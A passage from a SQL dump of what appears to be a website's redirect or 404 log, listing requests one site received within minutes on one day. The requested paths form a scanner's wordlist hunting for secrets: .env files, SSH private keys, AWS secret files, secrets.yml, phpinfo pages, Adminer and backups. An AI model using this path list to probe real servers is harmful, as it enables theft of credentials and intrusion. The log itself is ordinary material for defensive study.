00:00:00',301),(61621,'https://www.3s-technologies.com.tr/en/.remote',NULL,'','',1,0,'2026-04-12 10:36:58','0000-00-00 00:00:00',301),(61622,'https://www.3s-technologies.com.tr/en/.ssh/id_rsa',NULL,'','',1,0,'2026-04-12 10:36:59','0000-00-00 00:00:00',301),(61623,'https://www.3s-technologies.com.tr/en/.ssh/id_rsa.pub',NULL,'','',1,0,'2026-04-12 10:36:59','0000-00-00 00:00:00',301),(61624,'https://www.3s-technologies.com.tr/en/.travis.yml',NULL,'','',1,0,'2026-04-12 10:37:00','0000-00-00 00:00:00',301),(61625,'https://www.3s-technologies.com.tr/en/.vite',NULL,'','',1,0,'2026-04-12 10:37:00','0000-00-00 00:00:00',301),(61626,'https://www.3s-technologies.com.tr/en/.vscode/settings.json',NULL,'','',1,0,'2026-04-12 10:37:01','0000-00-00 00:00:00',301),(61627,'https://www.3s-technologies.com.tr/en/.well-known/openid-configuration',NULL,'','',1,0,'2026-04-12 10:37:01','0000-00-00 00:00:00',301),(61628,'https://www.3s-technologies.com.tr/en/.well-known/security.txt',NULL,'','',1,0,'2026-04-12 10:37:01','0000-00-00 00:00:00',301),(61629,'https://www.3s-technologies.com.tr/en/07-accessing-data/begin/vue-heroes/.env',NULL,'','',1,0,'2026-04-12 10:37:02','0000-00-00 00:00:00',301),(61630,'https://www.3s-technologies.com.tr/en/07-accessing-data/end/vue-heroes/.env',NULL,'','',1,0,'2026-04-12 10:37:02','0000-00-00 00:00:00',301),(61631,'https://www.3s-technologies.com.tr/en/08-routing/begin/vue-heroes/.env',NULL,'','',1,0,'2026-04-12 10:37:03','0000-00-00 00:00:00',301),(61632,'https://www.3s-technologies.com.tr/en/08-routing/end/vue-heroes/.env',NULL,'','',1,0,'2026-04-12 10:37:03','0000-00-00 00:00:00',301),(61633,'https://www.3s-technologies.com.tr/en/123.php',NULL,'','',1,0,'2026-04-12 10:37:05','0000-00-00 00:00:00',301),(61634,'https://www.3s-technologies.com.tr/en/3-sequelize/final/.env',NULL,'','',1,0,'2026-04-12 10:37:05','0000-00-00 00:00:00',301),(61635,'https://www.3s-technologies.com.tr/en/31_structure_tests/.env',NULL,'','',1,0,'2026-04-12 10:37:06','0000-00-00 00:00:00',301),(61636,'https://www.3s-technologies.com.tr/en/__debug__',NULL,'','',1,0,'2026-04-12 10:37:10','0000-00-00 00:00:00',301),(61637,'https://www.3s-technologies.com.tr/en/__debugbar',NULL,'','',1,0,'2026-04-12 10:37:10','0000-00-00 00:00:00',301),(61638,'https://www.3s-technologies.com.tr/en/__tests__/test-become/.env',NULL,'','',1,0,'2026-04-12 10:37:11','0000-00-00 00:00:00',301),(61639,'https://www.3s-technologies.com.tr/en/_astro/[chunk-name].[hash].js',NULL,'','',1,0,'2026-04-12 10:37:11','0000-00-00 00:00:00',301),(61640,'https://www.3s-technologies.com.tr/en/_dev',NULL,'','',1,0,'2026-04-12 10:37:12','0000-00-00 00:00:00',301),(61641,'https://www.3s-technologies.com.tr/en/_ignition',NULL,'','',1,0,'2026-04-12 10:37:12','0000-00-00 00:00:00',301),(61642,'https://www.3s-technologies.com.tr/en/_next/static/chunks/945-34f67d7c0866cf61b970.js',NULL,'','',1,0,'2026-04-12 10:37:13','0000-00-00 00:00:00',301),(61643,'https://www.3s-technologies.com.tr/en/_next/static/chunks/app/[...not-found]/page-63e952e68a371605.js',NULL,'','',1,0,'2026-04-12 10:37:13','0000-00-00 00:00:00',301),(61644,'https://www.3s-technologies.com.tr/en/_next/static/chunks/app/error.js',NULL,'','',1,0,'2026-04-12 10:37:14','0000-00-00 00:00:00',301),(61645,'https://www.3s-technologies.com.tr/en/_next/static/chunks/app/global-error.js',NULL,'','',1,0,'2026-04-12 10:37:14','0000-00-00 00:00:00',301),(61646,'https://www.3s-technologies.com.tr/en/_next/static/chunks/app/layout-a908fe02173ed4b1.js',NULL,'','',1,0,'2026-04-12 10:37:15','0000-00-00 00:00:00',301),(61647,'https://www.3s-technologies.com.tr/en/_next/static/chunks/framework-[hash].js',NULL,'','',1,0,'2026-04-12 10:37:15','0000-00-00 00:00:00',301),(61648,'https://www.3s-technologies.com.tr/en/_next/static/chunks/main-app-[hash].js',NULL,'','',1,0,'2026-04-12 10:37:16','0000-00-00 00:00:00',301),(61649,'https://www.3s-technologies.com.tr/en/_next/static/chunks/pages/_app-a9fba37d935ce3f3.js',NULL,'','',1,0,'2026-04-12 10:37:16','0000-00-00 00:00:00',301),(61650,'https://www.3s-technologies.com.tr/en/_next/static/chunks/pages/_app-d1b5411bacd03f02.js',NULL,'','',1,0,'2026-04-12 10:37:16','0000-00-00 00:00:00',301),(61651,'https://www.3s-technologies.com.tr/en/_next/static/chunks/pages/_app-d25b242610000153a081.js',NULL,'','',1,0,'2026-04-12 10:37:17','0000-00-00 00:00:00',301),(61652,'https://www.3s-technologies.com.tr/en/_next/static/chunks/webpack-[hash].js',NULL,'','',1,0,'2026-04-12 10:37:17','0000-00-00 00:00:00',301),(61653,'https://www.3s-technologies.com.tr/en/_static/.env',NULL,'','',1,0,'2026-04-12 10:37:18','0000-00-00 00:00:00',301),(61654,'https://www.3s-technologies.com.tr/en/a.php',NULL,'','',1,0,'2026-04-12 10:37:18','0000-00-00 00:00:00',301),(61655,'https://www.3s-technologies.com.tr/en/acme-challenge/.env',NULL,'','',1,0,'2026-04-12 10:37:18','0000-00-00 00:00:00',301),(61656,'https://www.3s-technologies.com.tr/en/acme/.env',NULL,'','',1,0,'2026-04-12 10:37:19','0000-00-00 00:00:00',301),(61657,'https://www.3s-technologies.com.tr/en/acme_challenges/.env',NULL,'','',1,0,'2026-04-12 10:37:19','0000-00-00 00:00:00',301),(61658,'https://www.3s-technologies.com.tr/en/actions-server/.env',NULL,'','',1,0,'2026-04-12 10:37:20','0000-00-00 00:00:00',301),(61659,'https://www.3s-technologies.com.tr/en/actuator',NULL,'','',1,0,'2026-04-12 10:37:20','0000-00-00 00:00:00',301),(61660,'https://www.3s-technologies.com.tr/en/admin-api',NULL,'','',1,0,'2026-04-12 10:37:21','0000-00-00 00:00:00',301),(61661,'https://www.3s-technologies.com.tr/en/admin-app/.env',NULL,'','',1,0,'2026-04-12 10:37:21','0000-00-00 00:00:00',301),(61662,'https://www.3s-technologies.com.tr/en/admin-panel/.env',NULL,'','',1,0,'2026-04-12 10:37:22','0000-00-00 00:00:00',301),(61663,'https://www.3s-technologies.com.tr/en/admin.php',NULL,'','',1,0,'2026-04-12 10:37:22','0000-00-00 00:00:00',301),(61664,'https://www.3s-technologies.com.tr/en/admin',NULL,'','',1,0,'2026-04-12 10:37:23','0000-00-00 00:00:00',301),(61665,'https://www.3s-technologies.com.tr/en/admin/info.php',NULL,'','',1,0,'2026-04-12 10:37:23','0000-00-00 00:00:00',301),(61666,'https://www.3s-technologies.com.tr/en/adminapp/.env',NULL,'','',1,0,'2026-04-12 10:37:24','0000-00-00 00:00:00',301),(61667,'https://www.3s-technologies.com.tr/en/adminer.php',NULL,'','',1,0,'2026-04-12 10:37:24','0000-00-00 00:00:00',301),(61668,'https://www.3s-technologies.com.tr/en/adminer/.env',NULL,'','',1,0,'2026-04-12 10:37:24','0000-00-00 00:00:00',301),(61669,'https://www.3s-technologies.com.tr/en/adminphp.php\'',NULL,'','',1,0,'2026-04-12 10:37:25','0000-00-00 00:00:00',301),(61670,'https://www.3s-technologies.com.tr/en/agora/.env',NULL,'','',1,0,'2026-04-12 10:37:26','0000-00-00 00:00:00',301),(61671,'https://www.3s-technologies.com.tr/en/alpha/.env',NULL,'','',1,0,'2026-04-12 10:37:26','0000-00-00 00:00:00',301),(61672,'https://www.3s-technologies.com.tr/en/anaconda/.env',NULL,'','',1,0,'2026-04-12 10:37:27','0000-00-00 00:00:00',301),(61673,'https://www.3s-technologies.com.tr/en/apache.php',NULL,'','',1,0,'2026-04-12 10:37:27','0000-00-00 00:00:00',301),(61674,'https://www.3s-technologies.com.tr/en/apache/i.php',NULL,'','',1,0,'2026-04-12 10:37:27','0000-00-00 00:00:00',301),(61675,'https://www.3s-technologies.com.tr/en/apache/info.php',NULL,'','',1,0,'2026-04-12 10:37:28','0000-00-00 00:00:00',301),(61676,'https://www.3s-technologies.com.tr/en/apache/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:37:28','0000-00-00 00:00:00',301),(61677,'https://www.3s-technologies.com.tr/en/apache2.php',NULL,'','',1,0,'2026-04-12 10:37:29','0000-00-00 00:00:00',301),(61678,'https://www.3s-technologies.com.tr/en/apc.php',NULL,'','',1,0,'2026-04-12 10:37:30','0000-00-00 00:00:00',301),(61679,'https://www.3s-technologies.com.tr/en/api-server/.env',NULL,'','',1,0,'2026-04-12 10:37:30','0000-00-00 00:00:00',301),(61680,'https://www.3s-technologies.com.tr/en/api/.env.back',NULL,'','',1,0,'2026-04-12 10:37:31','0000-00-00 00:00:00',301),(61681,'https://www.3s-technologies.com.tr/en/api/.env.example',NULL,'','',1,0,'2026-04-12 10:37:31','0000-00-00 00:00:00',301),(61682,'https://www.3s-technologies.com.tr/en/api/.env.sample',NULL,'','',1,0,'2026-04-12 10:37:32','0000-00-00 00:00:00',301),(61683,'https://www.3s-technologies.com.tr/en/api/.env.save',NULL,'','',1,0,'2026-04-12 10:37:32','0000-00-00 00:00:00',301),(61684,'https://www.3s-technologies.com.tr/en/api/debug',NULL,'','',1,0,'2026-04-12 10:37:32','0000-00-00 00:00:00',301),(61685,'https://www.3s-technologies.com.tr/en/api/docs',NULL,'','',1,0,'2026-04-12 10:37:33','0000-00-00 00:00:00',301),(61686,'https://www.3s-technologies.com.tr/en/api/env',NULL,'','',1,0,'2026-04-12 10:37:33','0000-00-00 00:00:00',301),(61687,'https://www.3s-technologies.com.tr/en/api/info.php',NULL,'','',1,0,'2026-04-12 10:37:33','0000-00-00 00:00:00',301),(61688,'https://www.3s-technologies.com.tr/en/api/internal',NULL,'','',1,0,'2026-04-12 10:37:34','0000-00-00 00:00:00',301),(61689,'https://www.3s-technologies.com.tr/en/api/keys',NULL,'','',1,0,'2026-04-12 10:37:34','0000-00-00 00:00:00',301),(61690,'https://www.3s-technologies.com.tr/en/api/private',NULL,'','',1,0,'2026-04-12 10:37:35','0000-00-00 00:00:00',301),(61691,'https://www.3s-technologies.com.tr/en/api/src/.env',NULL,'','',1,0,'2026-04-12 10:37:35','0000-00-00 00:00:00',301),(61692,'https://www.3s-technologies.com.tr/en/api/v1/.env',NULL,'','',1,0,'2026-04-12 10:37:35','0000-00-00 00:00:00',301),(61693,'https://www.3s-technologies.com.tr/en/api/v1/debug',NULL,'','',1,0,'2026-04-12 10:37:36','0000-00-00 00:00:00',301),(61694,'https://www.3s-technologies.com.tr/en/api/v2/.env',NULL,'','',1,0,'2026-04-12 10:37:36','0000-00-00 00:00:00',301),(61695,'https://www.3s-technologies.com.tr/en/apis/.env',NULL,'','',1,0,'2026-04-12 10:37:37','0000-00-00 00:00:00',301),(61696,'https://www.3s-technologies.com.tr/en/app-7d66de919618d3830635.js',NULL,'','',1,0,'2026-04-12 10:37:37','0000-00-00 00:00:00',301),(61697,'https://www.3s-technologies.com.tr/en/app-order-client/.env',NULL,'','',1,0,'2026-04-12 10:37:38','0000-00-00 00:00:00',301),(61698,'https://www.3s-technologies.com.tr/en/app.yaml',NULL,'','',1,0,'2026-04-12 10:37:38','0000-00-00 00:00:00',301),(61699,'https://www.3s-technologies.com.tr/en/app/.env.example',NULL,'','',1,0,'2026-04-12 10:37:38','0000-00-00 00:00:00',301),(61700,'https://www.3s-technologies.com.tr/en/app/.env.sample',NULL,'','',1,0,'2026-04-12 10:37:39','0000-00-00 00:00:00',301),(61701,'https://www.3s-technologies.com.tr/en/app/.env.save',NULL,'','',1,0,'2026-04-12 10:37:39','0000-00-00 00:00:00',301),(61702,'https://www.3s-technologies.com.tr/en/app/.env.back',NULL,'','',1,0,'2026-04-12 10:37:40','0000-00-00 00:00:00',301),(61703,'https://www.3s-technologies.com.tr/en/app/client/.env',NULL,'','',1,0,'2026-04-12 10:37:40','0000-00-00 00:00:00',301),(61704,'https://www.3s-technologies.com.tr/en/app/code/community/nosto/tagging/.env',NULL,'','',1,0,'2026-04-12 10:37:41','0000-00-00 00:00:00',301),(61705,'https://www.3s-technologies.com.tr/en/app/config.js',NULL,'','',1,0,'2026-04-12 10:37:41','0000-00-00 00:00:00',301),(61706,'https://www.3s-technologies.com.tr/en/app/config/.env',NULL,'','',1,0,'2026-04-12 10:37:42','0000-00-00 00:00:00',301),(61707,'https://www.3s-technologies.com.tr/en/app/config/dev/.env',NULL,'','',1,0,'2026-04-12 10:37:42','0000-00-00 00:00:00',301),(61708,'https://www.3s-technologies.com.tr/en/app/frontend/.env',NULL,'','',1,0,'2026-04-12 10:37:43','0000-00-00 00:00:00',301),(61709,'https://www.3s-technologies.com.tr/en/app/info',NULL,'','',1,0,'2026-04-12 10:37:43','0000-00-00 00:00:00',301),(61710,'https://www.3s-technologies.com.tr/en/app/info.php',NULL,'','',1,0,'2026-04-12 10:37:43','0000-00-00 00:00:00',301),(61711,'https://www.3s-technologies.com.tr/en/app1-static/.env',NULL,'','',1,0,'2026-04-12 10:37:44','0000-00-00 00:00:00',301),(61712,'https://www.3s-technologies.com.tr/en/app2-static/.env',NULL,'','',1,0,'2026-04-12 10:37:44','0000-00-00 00:00:00',301),(61713,'https://www.3s-technologies.com.tr/en/app_dir/.env',NULL,'','',1,0,'2026-04-12 10:37:45','0000-00-00 00:00:00',301),(61714,'https://www.3s-technologies.com.tr/en/app_nginx_static_path/.env',NULL,'','',1,0,'2026-04-12 10:37:45','0000-00-00 00:00:00',301),(61715,'https://www.3s-technologies.com.tr/en/application/.env.sample',NULL,'','',1,0,'2026-04-12 10:37:46','0000-00-00 00:00:00',301),(61716,'https://www.3s-technologies.com.tr/en/application/.env.save',NULL,'','',1,0,'2026-04-12 10:37:46','0000-00-00 00:00:00',301),(61717,'https://www.3s-technologies.com.tr/en/apps/.env',NULL,'','',1,0,'2026-04-12 10:37:47','0000-00-00 00:00:00',301),(61718,'https://www.3s-technologies.com.tr/en/apps/client/.env',NULL,'','',1,0,'2026-04-12 10:37:47','0000-00-00 00:00:00',301),(61719,'https://www.3s-technologies.com.tr/en/archipel/.env',NULL,'','',1,0,'2026-04-12 10:37:48','0000-00-00 00:00:00',301),(61720,'https://www.3s-technologies.com.tr/en/asset_img/.env',NULL,'','',1,0,'2026-04-12 10:37:48','0000-00-00 00:00:00',301),(61721,'https://www.3s-technologies.com.tr/en/assets/.env',NULL,'','',1,0,'2026-04-12 10:37:49','0000-00-00 00:00:00',301),(61722,'https://www.3s-technologies.com.tr/en/assets/index-[hash].js',NULL,'','',1,0,'2026-04-12 10:37:49','0000-00-00 00:00:00',301),(61723,'https://www.3s-technologies.com.tr/en/assets/index-[hash].mjs',NULL,'','',1,0,'2026-04-12 10:37:50','0000-00-00 00:00:00',301),(61724,'https://www.3s-technologies.com.tr/en/assets/index-gqudngwd.js',NULL,'','',1,0,'2026-04-12 10:37:50','0000-00-00 00:00:00',301),(61725,'https://www.3s-technologies.com.tr/en/assets/js/app.f8ec9fb3.js',NULL,'','',1,0,'2026-04-12 10:37:51','0000-00-00 00:00:00',301),(61726,'https://www.3s-technologies.com.tr/en/assets/js/app.js',NULL,'','',1,0,'2026-04-12 10:37:51','0000-00-00 00:00:00',301),(61727,'https://www.3s-technologies.com.tr/en/assets/vendor-[hash].js',NULL,'','',1,0,'2026-04-12 10:37:52','0000-00-00 00:00:00',301),(61728,'https://www.3s-technologies.com.tr/en/assignment3/.env',NULL,'','',1,0,'2026-04-12 10:37:52','0000-00-00 00:00:00',301),(61729,'https://www.3s-technologies.com.tr/en/assignment4/.env',NULL,'','',1,0,'2026-04-12 10:37:53','0000-00-00 00:00:00',301),(61730,'https://www.3s-technologies.com.tr/en/audio/.env',NULL,'','',1,0,'2026-04-12 10:37:53','0000-00-00 00:00:00',301),(61731,'https://www.3s-technologies.com.tr/en/aws-secret.json',NULL,'','',1,0,'2026-04-12 10:37:54','0000-00-00 00:00:00',301),(61732,'https://www.3s-technologies.com.tr/en/aws.yml',NULL,'','',1,0,'2026-04-12 10:37:54','0000-00-00 00:00:00',301),(61733,'https://www.3s-technologies.com.tr/en/aws/.env',NULL,'','',1,0,'2026-04-12 10:37:55','0000-00-00 00:00:00',301),(61734,'https://www.3s-technologies.com.tr/en/azure/.env',NULL,'','',1,0,'2026-04-12 10:37:55','0000-00-00 00:00:00',301),(61735,'https://www.3s-technologies.com.tr/en/babel-plugin-dotenv/test/fixtures/as-alias/.env',NULL,'','',1,0,'2026-04-12 10:37:55','0000-00-00 00:00:00',301),(61736,'https://www.3s-technologies.com.tr/en/babel-plugin-dotenv/test/fixtures/default/.env',NULL,'','',1,0,'2026-04-12 10:37:56','0000-00-00 00:00:00',301),(61737,'https://www.3s-technologies.com.tr/en/babel-plugin-dotenv/test/fixtures/dev-env/.env',NULL,'','',1,0,'2026-04-12 10:37:56','0000-00-00 00:00:00',301),(61738,'https://www.3s-technologies.com.tr/en/babel-plugin-dotenv/test/fixtures/empty-values/.env',NULL,'','',1,0,'2026-04-12 10:37:57','0000-00-00 00:00:00',301),(61739,'https://www.3s-technologies.com.tr/en/babel-plugin-dotenv/test/fixtures/filename/.env',NULL,'','',1,0,'2026-04-12 10:37:57','0000-00-00 00:00:00',301),(61740,'https://www.3s-technologies.com.tr/en/babel-plugin-dotenv/test/fixtures/override-value/.env',NULL,'','',1,0,'2026-04-12 10:37:58','0000-00-00 00:00:00',301),(61741,'https://www.3s-technologies.com.tr/en/babel-plugin-dotenv/test/fixtures/prod-env/.env',NULL,'','',1,0,'2026-04-12 10:37:58','0000-00-00 00:00:00',301),(61742,'https://www.3s-technologies.com.tr/en/back-end/app/.env',NULL,'','',1,0,'2026-04-12 10:37:58','0000-00-00 00:00:00',301),(61743,'https://www.3s-technologies.com.tr/en/back/.env',NULL,'','',1,0,'2026-04-12 10:37:59','0000-00-00 00:00:00',301),(61744,'https://www.3s-technologies.com.tr/en/backend/.env.local',NULL,'','',1,0,'2026-04-12 10:37:59','0000-00-00 00:00:00',301),(61745,'https://www.3s-technologies.com.tr/en/backend/config/.env',NULL,'','',1,0,'2026-04-12 10:38:00','0000-00-00 00:00:00',301),(61746,'https://www.3s-technologies.com.tr/en/backend/debug',NULL,'','',1,0,'2026-04-12 10:38:00','0000-00-00 00:00:00',301),(61747,'https://www.3s-technologies.com.tr/en/backend/src/.env',NULL,'','',1,0,'2026-04-12 10:38:01','0000-00-00 00:00:00',301),(61748,'https://www.3s-technologies.com.tr/en/backendfinaltest/.env',NULL,'','',1,0,'2026-04-12 10:38:01','0000-00-00 00:00:00',301),(61749,'https://www.3s-technologies.com.tr/en/backup.tar.gz',NULL,'','',1,0,'2026-04-12 10:38:02','0000-00-00 00:00:00',301),(61750,'https://www.3s-technologies.com.tr/en/backup.zip',NULL,'','',1,0,'2026-04-12 10:38:02','0000-00-00 00:00:00',301),(61751,'https://www.3s-technologies.com.tr/en/base_dir/.env',NULL,'','',1,0,'2026-04-12 10:38:02','0000-00-00 00:00:00',301),(61752,'https://www.3s-technologies.com.tr/en/basic-network/.env',NULL,'','',1,0,'2026-04-12 10:38:03','0000-00-00 00:00:00',301),(61753,'https://www.3s-technologies.com.tr/en/bgoldd/.env',NULL,'','',1,0,'2026-04-12 10:38:03','0000-00-00 00:00:00',301),(61754,'https://www.3s-technologies.com.tr/en/bitcoind/.env',NULL,'','',1,0,'2026-04-12 10:38:04','0000-00-00 00:00:00',301),(61755,'https://www.3s-technologies.com.tr/en/blankon/.env',NULL,'','',1,0,'2026-04-12 10:38:04','0000-00-00 00:00:00',301),(61756,'https://www.3s-technologies.com.tr/en/blob/.env',NULL,'','',1,0,'2026-04-12 10:38:05','0000-00-00 00:00:00',301),(61757,'https://www.3s-technologies.com.tr/en/blog/.env',NULL,'','',1,0,'2026-04-12 10:38:05','0000-00-00 00:00:00',301),(61758,'https://www.3s-technologies.com.tr/en/blogs/.env',NULL,'','',1,0,'2026-04-12 10:38:05','0000-00-00 00:00:00',301),(61759,'https://www.3s-technologies.com.tr/en/blue/.env',NULL,'','',1,0,'2026-04-12 10:38:06','0000-00-00 00:00:00',301),(61760,'https://www.3s-technologies.com.tr/en/bookchain-client/.env',NULL,'','',1,0,'2026-04-12 10:38:06','0000-00-00 00:00:00',301),(61761,'https://www.3s-technologies.com.tr/en/booking/default.aspx',NULL,'','',1,0,'2026-04-12 10:38:06','0000-00-00 00:00:00',301),(61762,'https://www.3s-technologies.com.tr/en/bootstrap/.env',NULL,'','',1,0,'2026-04-12 10:38:07','0000-00-00 00:00:00',301),(61763,'https://www.3s-technologies.com.tr/en/boxes/oracle-vagrant-boxes/containerregistry/.env',NULL,'','',1,0,'2026-04-12 10:38:07','0000-00-00 00:00:00',301),(61764,'https://www.3s-technologies.com.tr/en/boxes/oracle-vagrant-boxes/kubernetes/.env',NULL,'','',1,0,'2026-04-12 10:38:08','0000-00-00 00:00:00',301),(61765,'https://www.3s-technologies.com.tr/en/boxes/oracle-vagrant-boxes/olcne/.env',NULL,'','',1,0,'2026-04-12 10:38:08','0000-00-00 00:00:00',301),(61766,'https://www.3s-technologies.com.tr/en/bucoffea/.env',NULL,'','',1,0,'2026-04-12 10:38:09','0000-00-00 00:00:00',301),(61767,'https://www.3s-technologies.com.tr/en/build.php',NULL,'','',1,0,'2026-04-12 10:38:09','0000-00-00 00:00:00',301),(61768,'https://www.3s-technologies.com.tr/en/build',NULL,'','',1,0,'2026-04-12 10:38:10','0000-00-00 00:00:00',301),(61769,'https://www.3s-technologies.com.tr/en/build/.env',NULL,'','',1,0,'2026-04-12 10:38:10','0000-00-00 00:00:00',301),(61770,'https://www.3s-technologies.com.tr/en/build/_app/immutable/chunks/[chunk].[hash].js',NULL,'','',1,0,'2026-04-12 10:38:11','0000-00-00 00:00:00',301),(61771,'https://www.3s-technologies.com.tr/en/build/_app/immutable/entry/app.[hash].js',NULL,'','',1,0,'2026-04-12 10:38:11','0000-00-00 00:00:00',301),(61772,'https://www.3s-technologies.com.tr/en/build/entry.client-[hash].js',NULL,'','',1,0,'2026-04-12 10:38:12','0000-00-00 00:00:00',301),(61773,'https://www.3s-technologies.com.tr/en/build/main.ba0c34b7.js',NULL,'','',1,0,'2026-04-12 10:38:12','0000-00-00 00:00:00',301),(61774,'https://www.3s-technologies.com.tr/en/build/routes/index-[hash].js',NULL,'','',1,0,'2026-04-12 10:38:12','0000-00-00 00:00:00',301),(61775,'https://www.3s-technologies.com.tr/en/cache.php',NULL,'','',1,0,'2026-04-12 10:38:13','0000-00-00 00:00:00',301),(61776,'https://www.3s-technologies.com.tr/en/cardea/backend/.env',NULL,'','',1,0,'2026-04-12 10:38:13','0000-00-00 00:00:00',301),(61777,'https://www.3s-technologies.com.tr/en/cdw-backend/.env',NULL,'','',1,0,'2026-04-12 10:38:14','0000-00-00 00:00:00',301),(61778,'https://www.3s-technologies.com.tr/en/cgi-bin/.env',NULL,'','',1,0,'2026-04-12 10:38:14','0000-00-00 00:00:00',301),(61779,'https://www.3s-technologies.com.tr/en/cgi-bin/pass.txt',NULL,'','',1,0,'2026-04-12 10:38:15','0000-00-00 00:00:00',301),(61780,'https://www.3s-technologies.com.tr/en/ch2-mytodo/.env',NULL,'','',1,0,'2026-04-12 10:38:15','0000-00-00 00:00:00',301),(61781,'https://www.3s-technologies.com.tr/en/ch6-mytodo/.env',NULL,'','',1,0,'2026-04-12 10:38:16','0000-00-00 00:00:00',301),(61782,'https://www.3s-technologies.com.tr/en/ch6a-mytodo/.env',NULL,'','',1,0,'2026-04-12 10:38:16','0000-00-00 00:00:00',301),(61783,'https://www.3s-technologies.com.tr/en/ch7-mytodo/.env',NULL,'','',1,0,'2026-04-12 10:38:17','0000-00-00 00:00:00',301),(61784,'https://www.3s-technologies.com.tr/en/ch7a-mytodo/.env',NULL,'','',1,0,'2026-04-12 10:38:17','0000-00-00 00:00:00',301),(61785,'https://www.3s-technologies.com.tr/en/ch8-mytodo/.env',NULL,'','',1,0,'2026-04-12 10:38:17','0000-00-00 00:00:00',301),(61786,'https://www.3s-technologies.com.tr/en/ch8a-mytodo/.env',NULL,'','',1,0,'2026-04-12 10:38:18','0000-00-00 00:00:00',301),(61787,'https://www.3s-technologies.com.tr/en/ch8b-mytodo/.env',NULL,'','',1,0,'2026-04-12 10:38:18','0000-00-00 00:00:00',301),(61788,'https://www.3s-technologies.com.tr/en/chai/.env',NULL,'','',1,0,'2026-04-12 10:38:18','0000-00-00 00:00:00',301),(61789,'https://www.3s-technologies.com.tr/en/challenge/.env',NULL,'','',1,0,'2026-04-12 10:38:19','0000-00-00 00:00:00',301),(61790,'https://www.3s-technologies.com.tr/en/challenges/.env',NULL,'','',1,0,'2026-04-12 10:38:19','0000-00-00 00:00:00',301),(61791,'https://www.3s-technologies.com.tr/en/charts/liveobjects/.env',NULL,'','',1,0,'2026-04-12 10:38:20','0000-00-00 00:00:00',301),(61792,'https://www.3s-technologies.com.tr/en/chat-client/.env',NULL,'','',1,0,'2026-04-12 10:38:20','0000-00-00 00:00:00',301),(61793,'https://www.3s-technologies.com.tr/en/chiminey/.env',NULL,'','',1,0,'2026-04-12 10:38:21','0000-00-00 00:00:00',301),(61794,'https://www.3s-technologies.com.tr/en/chunk-b2fodb4i.js',NULL,'','',1,0,'2026-04-12 10:38:21','0000-00-00 00:00:00',301),(61795,'https://www.3s-technologies.com.tr/en/ci/.env',NULL,'','',1,0,'2026-04-12 10:38:21','0000-00-00 00:00:00',301),(61796,'https://www.3s-technologies.com.tr/en/client-app/.env',NULL,'','',1,0,'2026-04-12 10:38:22','0000-00-00 00:00:00',301),(61797,'https://www.3s-technologies.com.tr/en/client/mutual-fund-app/.env',NULL,'','',1,0,'2026-04-12 10:38:22','0000-00-00 00:00:00',301),(61798,'https://www.3s-technologies.com.tr/en/client/src/.env',NULL,'','',1,0,'2026-04-12 10:38:23','0000-00-00 00:00:00',301),(61799,'https://www.3s-technologies.com.tr/en/clientapp/.env',NULL,'','',1,0,'2026-04-12 10:38:23','0000-00-00 00:00:00',301),(61800,'https://www.3s-technologies.com.tr/en/clld_dir/.env',NULL,'','',1,0,'2026-04-12 10:38:24','0000-00-00 00:00:00',301),(61801,'https://www.3s-technologies.com.tr/en/cloud/.env',NULL,'','',1,0,'2026-04-12 10:38:24','0000-00-00 00:00:00',301),(61802,'https://www.3s-technologies.com.tr/en/cmd/testdata/expected/dot_env/.env',NULL,'','',1,0,'2026-04-12 10:38:25','0000-00-00 00:00:00',301),(61803,'https://www.3s-technologies.com.tr/en/code/api/.env',NULL,'','',1,0,'2026-04-12 10:38:25','0000-00-00 00:00:00',301),(61804,'https://www.3s-technologies.com.tr/en/code/web/.env',NULL,'','',1,0,'2026-04-12 10:38:26','0000-00-00 00:00:00',301),(61805,'https://www.3s-technologies.com.tr/en/codegolf.web/clientapp/.env',NULL,'','',1,0,'2026-04-12 10:38:26','0000-00-00 00:00:00',301),(61806,'https://www.3s-technologies.com.tr/en/codenames-frontend/.env',NULL,'','',1,0,'2026-04-12 10:38:27','0000-00-00 00:00:00',301),(61807,'https://www.3s-technologies.com.tr/en/collab-connect-web-application/server/.env',NULL,'','',1,0,'2026-04-12 10:38:27','0000-00-00 00:00:00',301),(61808,'https://www.3s-technologies.com.tr/en/collected_static/.env',NULL,'','',1,0,'2026-04-12 10:38:28','0000-00-00 00:00:00',301),(61809,'https://www.3s-technologies.com.tr/en/community/.env',NULL,'','',1,0,'2026-04-12 10:38:28','0000-00-00 00:00:00',301),(61810,'https://www.3s-technologies.com.tr/en/compose/.env',NULL,'','',1,0,'2026-04-12 10:38:29','0000-00-00 00:00:00',301),(61811,'https://www.3s-technologies.com.tr/en/config.js',NULL,'','',1,0,'2026-04-12 10:38:29','0000-00-00 00:00:00',301),(61812,'https://www.3s-technologies.com.tr/en/config.yaml',NULL,'','',1,0,'2026-04-12 10:38:30','0000-00-00 00:00:00',301),(61813,'https://www.3s-technologies.com.tr/en/config/.env.dev',NULL,'','',1,0,'2026-04-12 10:38:30','0000-00-00 00:00:00',301),(61814,'https://www.3s-technologies.com.tr/en/config/.env.local',NULL,'','',1,0,'2026-04-12 10:38:30','0000-00-00 00:00:00',301),(61815,'https://www.3s-technologies.com.tr/en/config/.env.production',NULL,'','',1,0,'2026-04-12 10:38:31','0000-00-00 00:00:00',301),(61816,'https://www.3s-technologies.com.tr/en/config/aws.yml',NULL,'','',1,0,'2026-04-12 10:38:31','0000-00-00 00:00:00',301),(61817,'https://www.3s-technologies.com.tr/en/config/cache.php',NULL,'','',1,0,'2026-04-12 10:38:32','0000-00-00 00:00:00',301),(61818,'https://www.3s-technologies.com.tr/en/config/config.env',NULL,'','',1,0,'2026-04-12 10:38:32','0000-00-00 00:00:00',301),(61819,'https://www.3s-technologies.com.tr/en/config/config.yml',NULL,'','',1,0,'2026-04-12 10:38:32','0000-00-00 00:00:00',301),(61820,'https://www.3s-technologies.com.tr/en/config/default.json',NULL,'','',1,0,'2026-04-12 10:38:33','0000-00-00 00:00:00',301),(61821,'https://www.3s-technologies.com.tr/en/config/keys.yml',NULL,'','',1,0,'2026-04-12 10:38:33','0000-00-00 00:00:00',301),(61822,'https://www.3s-technologies.com.tr/en/config/production.json',NULL,'','',1,0,'2026-04-12 10:38:34','0000-00-00 00:00:00',301),(61823,'https://www.3s-technologies.com.tr/en/config/secrets.yml',NULL,'','',1,0,'2026-04-12 10:38:34','0000-00-00 00:00:00',301),(61824,'https://www.3s-technologies.com.tr/en/config/settings.py',NULL,'','',1,0,'2026-04-12 10:38:35','0000-00-00 